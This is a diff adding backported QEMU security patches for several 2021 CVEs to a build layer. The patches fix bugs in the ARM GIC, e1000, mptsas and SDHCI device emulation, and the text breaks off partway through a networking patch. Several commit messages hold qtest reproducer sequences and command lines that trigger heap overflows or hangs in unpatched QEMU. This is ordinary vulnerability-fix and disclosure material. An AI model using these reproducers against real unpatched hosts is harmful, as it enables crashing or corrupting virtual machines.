diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
new file mode 100644
index 0000000000..46c9ab4184
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
@@ -0,0 +1,67 @@
+From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Sun, 31 Jan 2021 11:34:01 +0100
+Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the ARM Generic Interrupt Controller Architecture specification
+(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit,
+not 10:
+
+ - 4.3 Distributor register descriptions
+ - 4.3.15 Software Generated Interrupt Register, GICD_SG
+
+ - Table 4-21 GICD_SGIR bit assignments
+
+ The Interrupt ID of the SGI to forward to the specified CPU
+ interfaces. The value of this field is the Interrupt ID, in
+ the range 0-15, for example a value of 0b0011 specifies
+ Interrupt ID 3.
+
+Correct the irq mask to fix an undefined behavior (which eventually
+lead to a heap-buffer-overflow, see [Buglink]):
+
+ $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio
+ [I 1612088147.116987] OPENED
+ [R +0.278293] writel 0x8000f00 0xff4affb0
+ ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]'
+ SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13
+
+This fixes a security issue when running with KVM on Arm with
+kernel-irqchip=off. (The default is kernel-irqchip=on, which is
+unaffected, and which is also the correct choice for performance.)
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2021-20221
+Fixes: 9ee6e8bb853 ("ARMv7 support.")
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913916
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913917
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Message-id: 20210131103401.217160-1-f4bug@amsat.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-20221
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/intc/arm_gic.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/intc/arm_gic.c
+===================================================================
+--- qemu-4.2.0.orig/hw/intc/arm_gic.c
++++ qemu-4.2.0/hw/intc/arm_gic.c
+@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque
+ int target_cpu;
+
+ cpu = gic_get_current_cpu(s);
+- irq = value & 0x3ff;
++ irq = value & 0xf;
+ switch ((value >> 24) & 3) {
+ case 0:
+ mask = (value >> 16) & ALL_CPU_MASK;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
new file mode 100644
index 0000000000..7175b24e99
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
@@ -0,0 +1,55 @@
+From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:45:28 +0800
+Subject: [PATCH] e1000: fail early for evil descriptor
+
+During procss_tx_desc(), driver can try to chain data descriptor with
+legacy descriptor, when will lead underflow for the following
+calculation in process_tx_desc() for bytes:
+
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+This will lead a infinite loop. So check and fail early if tp->size if
+greater or equal to msh.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de>
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8]
+CVE: CVE-2021-20257
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index cf22c4f07..c3564c7ce 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ msh = tp->tso_props.hdr_len + tp->tso_props.mss;
+ do {
+ bytes = split_size;
++ if (tp->size >= msh) {
++ goto eop;
++ }
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ tp->size += split_size;
+ }
+
++eop:
+ if (!(txd_lower & E1000_TXD_CMD_EOP))
+ return;
+ if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) {
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
new file mode 100644
index 0000000000..45b8a4f1dd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
@@ -0,0 +1,92 @@
+From 3791642c8d60029adf9b00bcb4e34d7d8a1aea4d Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 19 Apr 2021 15:42:47 +0200
+Subject: [PATCH] mptsas: Remove unused MPTSASState 'pending' field
+ (CVE-2021-3392)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+While processing SCSI i/o requests in mptsas_process_scsi_io_request(),
+the Megaraid emulator appends new MPTSASRequest object 'req' to
+the 's->pending' queue. In case of an error, this same object gets
+dequeued in mptsas_free_request() only if SCSIRequest object
+'req->sreq' is initialised. This may lead to a use-after-free issue.
+
+Since s->pending is actually not used, simply remove it from
+MPTSASState.
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Message-id: 20210419134247.1467982-1-f4bug@amsat.org
+Message-Id: <20210416102243.1293871-1-mjt@msgid.tls.msk.ru>
+Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+BugLink: https://bugs.launchpad.net/qemu/+bug/1914236 (CVE-2021-3392)
+Fixes: e351b826112 ("hw: Add support for LSI SAS1068 (mptsas) device")
+[PMD: Reworded description, added more tags]
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport [ https://git.qemu.org/?p=qemu.git;a=commit;h=3791642c8d60029adf9b00bcb4e34d7d8a1aea4d ]
+CVE: CVE-2021-3392
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/mptsas.c | 6 ------
+ hw/scsi/mptsas.h | 1 -
+ 2 files changed, 7 deletions(-)
+
+diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
+index 7416e78..db3219e 100644
+--- a/hw/scsi/mptsas.c
++++ b/hw/scsi/mptsas.c
+@@ -251,13 +251,10 @@ static int mptsas_build_sgl(MPTSASState *s, MPTSASRequest *req, hwaddr addr)
+
+ static void mptsas_free_request(MPTSASRequest *req)
+ {
+- MPTSASState *s = req->dev;
+-
+ if (req->sreq != NULL) {
+ req->sreq->hba_private = NULL;
+ scsi_req_unref(req->sreq);
+ req->sreq = NULL;
+- QTAILQ_REMOVE(&s->pending, req, next);
+ }
+ qemu_sglist_destroy(&req->qsg);
+ g_free(req);
+@@ -303,7 +300,6 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
+ }
+
+ req = g_new0(MPTSASRequest, 1);
+- QTAILQ_INSERT_TAIL(&s->pending, req, next);
+ req->scsi_io = *scsi_io;
+ req->dev = s;
+
+@@ -1319,8 +1315,6 @@ static void mptsas_scsi_realize(PCIDevice *dev, Error **errp)
+
+ s->request_bh = qemu_bh_new(mptsas_fetch_requests, s);
+
+- QTAILQ_INIT(&s->pending);
+-
+ scsi_bus_new(&s->bus, sizeof(s->bus), &dev->qdev, &mptsas_scsi_info, NULL);
+ }
+
+diff --git a/hw/scsi/mptsas.h b/hw/scsi/mptsas.h
+index b85ac1a..c046497 100644
+--- a/hw/scsi/mptsas.h
++++ b/hw/scsi/mptsas.h
+@@ -79,7 +79,6 @@ struct MPTSASState {
+ uint16_t reply_frame_size;
+
+ SCSIBus bus;
+- QTAILQ_HEAD(, MPTSASRequest) pending;
+ };
+
+ void mptsas_fix_scsi_io_endianness(MPIMsgSCSIIORequest *req);
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
new file mode 100644
index 0000000000..d53383247e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
@@ -0,0 +1,85 @@
+From b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:35 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't transfer any data when command time out
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+At the end of sdhci_send_command(), it starts a data transfer if the
+command register indicates data is associated. But the data transfer
+should only be initiated when the command execution has succeeded.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001810
+outl 0xcfc 0xe1068000
+outl 0xcf8 0x80001804
+outw 0xcfc 0x7
+write 0xe106802c 0x1 0x0f
+write 0xe1068004 0xc 0x2801d10101fffffbff28a384
+write 0xe106800c 0x1f 0x9dacbbcad9e8f7061524334251606f7e8d9cabbac9d8e7f60514233241505f
+write 0xe1068003 0x28 0x80d000251480d000252280d000253080d000253e80d000254c80d000255a80d000256880d0002576
+write 0xe1068003 0x1 0xfe
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -M pc-q35-5.0 \
+ -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive \
+ -monitor none -serial none -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Acked-by: Alistair Francis <alistair.francis@wdc.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Tested-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-2-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-1.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -316,6 +316,7 @@ static void sdhci_send_command(SDHCIStat
+ SDRequest request;
+ uint8_t response[16];
+ int rlen;
++ bool timeout = false;
+
+ s->errintsts = 0;
+ s->acmd12errsts = 0;
+@@ -339,6 +340,7 @@ static void sdhci_send_command(SDHCIStat
+ trace_sdhci_response16(s->rspreg[3], s->rspreg[2],
+ s->rspreg[1], s->rspreg[0]);
+ } else {
++ timeout = true;
+ trace_sdhci_error("timeout waiting for command response");
+ if (s->errintstsen & SDHC_EISEN_CMDTIMEOUT) {
+ s->errintsts |= SDHC_EIS_CMDTIMEOUT;
+@@ -359,7 +361,7 @@ static void sdhci_send_command(SDHCIStat
+
+ sdhci_update_irq(s);
+
+- if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
++ if (!timeout && s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
+ s->data_count = 0;
+ sdhci_data_transfer(s);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
new file mode 100644
index 0000000000..dc00f76ec9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
@@ -0,0 +1,103 @@
+From 8be45cc947832b3c02144c9d52921f499f2d77fe Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:36 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't write to SDHC_SYSAD register when
+ transfer is in progress
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Per "SD Host Controller Standard Specification Version 7.00"
+chapter 2.2.1 SDMA System Address Register:
+
+This register can be accessed only if no transaction is executing
+(i.e., after a transaction has stopped).
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xfbefff00
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xfbefff2c 0x1 0x05
+write 0xfbefff0f 0x1 0x37
+write 0xfbefff0a 0x1 0x01
+write 0xfbefff0f 0x1 0x29
+write 0xfbefff0f 0x1 0x02
+write 0xfbefff0f 0x1 0x03
+write 0xfbefff04 0x1 0x01
+write 0xfbefff05 0x1 0x01
+write 0xfbefff07 0x1 0x02
+write 0xfbefff0c 0x1 0x33
+write 0xfbefff0e 0x1 0x20
+write 0xfbefff0f 0x1 0x00
+write 0xfbefff2a 0x1 0x01
+write 0xfbefff0c 0x1 0x00
+write 0xfbefff03 0x1 0x00
+write 0xfbefff05 0x1 0x00
+write 0xfbefff2a 0x1 0x02
+write 0xfbefff0c 0x1 0x32
+write 0xfbefff01 0x1 0x01
+write 0xfbefff02 0x1 0x01
+write 0xfbefff03 0x1 0x01
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-3-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-2.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8be45cc947832b3c02144c9d52921f499f2d77fe ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1117,15 +1117,17 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ switch (offset & ~0x3) {
+ case SDHC_SYSAD:
+- s->sdmasysad = (s->sdmasysad & mask) | value;
+- MASKED_WRITE(s->sdmasysad, mask, value);
+- /* Writing to last byte of sdmasysad might trigger transfer */
+- if (!(mask & 0xFF000000) && TRANSFERRING_DATA(s->prnsts) && s->blkcnt &&
+- s->blksize && SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
+- if (s->trnmod & SDHC_TRNS_MULTI) {
+- sdhci_sdma_transfer_multi_blocks(s);
+- } else {
+- sdhci_sdma_transfer_single_block(s);
++ if (!TRANSFERRING_DATA(s->prnsts)) {
++ s->sdmasysad = (s->sdmasysad & mask) | value;
++ MASKED_WRITE(s->sdmasysad, mask, value);
++ /* Writing to last byte of sdmasysad might trigger transfer */
++ if (!(mask & 0xFF000000) && s->blkcnt && s->blksize &&
++ SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
++ if (s->trnmod & SDHC_TRNS_MULTI) {
++ sdhci_sdma_transfer_multi_blocks(s);
++ } else {
++ sdhci_sdma_transfer_single_block(s);
++ }
+ }
+ }
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
new file mode 100644
index 0000000000..d06ac0ed3c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
@@ -0,0 +1,71 @@
+Backport of:
+
+From bc6f28995ff88f5d82c38afcfd65406f0ae375aa Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:37 +0800
+Subject: [PATCH] hw/sd: sdhci: Correctly set the controller status for ADMA
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When an ADMA transfer is started, the codes forget to set the
+controller status to indicate a transfer is in progress.
+
+With this fix, the following 2 reproducers:
+
+https://paste.debian.net/plain/1185136
+https://paste.debian.net/plain/1185141
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-4-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/bc6f28995ff88f5d82c38afcfd65406f0ae375aa ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -776,8 +776,9 @@ static void sdhci_do_adma(SDHCIState *s)
+
+ switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
+ case SDHC_ADMA_ATTR_ACT_TRAN: /* data transfer */
+-
++ s->prnsts |= SDHC_DATA_INHIBIT | SDHC_DAT_LINE_ACTIVE;
+ if (s->trnmod & SDHC_TRNS_READ) {
++ s->prnsts |= SDHC_DOING_READ;
+ while (length) {
+ if (s->data_count == 0) {
+ for (n = 0; n < block_size; n++) {
+@@ -807,6 +808,7 @@ static void sdhci_do_adma(SDHCIState *s)
+ }
+ }
+ } else {
++ s->prnsts |= SDHC_DOING_WRITE;
+ while (length) {
+ begin = s->data_count;
+ if ((length + begin) < block_size) {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
new file mode 100644
index 0000000000..2e49e3bc18
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From 5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:38 +0800
+Subject: [PATCH] hw/sd: sdhci: Limit block size only when SDHC_BLKSIZE
+ register is writable
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+The codes to limit the maximum block size is only necessary when
+SDHC_BLKSIZE register is writable.
+
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-5-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1137,15 +1137,15 @@ sdhci_write(void *opaque, hwaddr offset,
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+- }
+
+- /* Limit block size to the maximum buffer size */
+- if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
+- qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than " \
+- "the maximum buffer 0x%x", __func__, s->blksize,
+- s->buf_maxsz);
++ /* Limit block size to the maximum buffer size */
++ if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than "
++ "the maximum buffer 0x%x\n", __func__, s->blksize,
++ s->buf_maxsz);
+
+- s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ }
+ }
+
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
new file mode 100644
index 0000000000..7b436809e9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
@@ -0,0 +1,93 @@
+From cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:39 +0800
+Subject: [PATCH] hw/sd: sdhci: Reset the data pointer of s->fifo_buffer[] when
+ a different block size is programmed
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+If the block size is programmed to a different value from the
+previous one, reset the data pointer of s->fifo_buffer[] so that
+s->fifo_buffer[] can be filled in using the new block size in
+the next transfer.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xe0000000
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xe000002c 0x1 0x05
+write 0xe0000005 0x1 0x02
+write 0xe0000007 0x1 0x01
+write 0xe0000028 0x1 0x10
+write 0x0 0x1 0x23
+write 0x2 0x1 0x08
+write 0xe000000c 0x1 0x01
+write 0xe000000e 0x1 0x20
+write 0xe000000f 0x1 0x00
+write 0xe000000c 0x1 0x32
+write 0xe0000004 0x2 0x0200
+write 0xe0000028 0x1 0x00
+write 0xe0000003 0x1 0x40
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-6-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1135,6 +1135,8 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
++ uint16_t blksize = s->blksize;
++
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+
+@@ -1146,6 +1148,16 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
+ }
++
++ /*
++ * If the block size is programmed to a different value from
++ * the previous one, reset the data pointer of s->fifo_buffer[]
++ * so that s->fifo_buffer[] can be filled in using the new block
++ * size in the next transfer.
++ */
++ if (blksize != s->blksize) {
++ s->data_count = 0;
++ }
+ }
+
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
new file mode 100644
index 0000000000..5bacd67481
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
@@ -0,0 +1,177 @@
+From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 11:44:36 +0800
+Subject: [PATCH 01/10] net: introduce qemu_receive_packet()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some NIC supports loopback mode and this is done by calling
+nc->info->receive() directly which in fact suppresses the effort of
+reentrancy check that is done in qemu_net_queue_send().
+
+Unfortunately we can't use qemu_net_queue_send() here since for
+loopback there's no sender as peer, so this patch introduce a
+qemu_receive_packet() which is used for implementing loopback mode
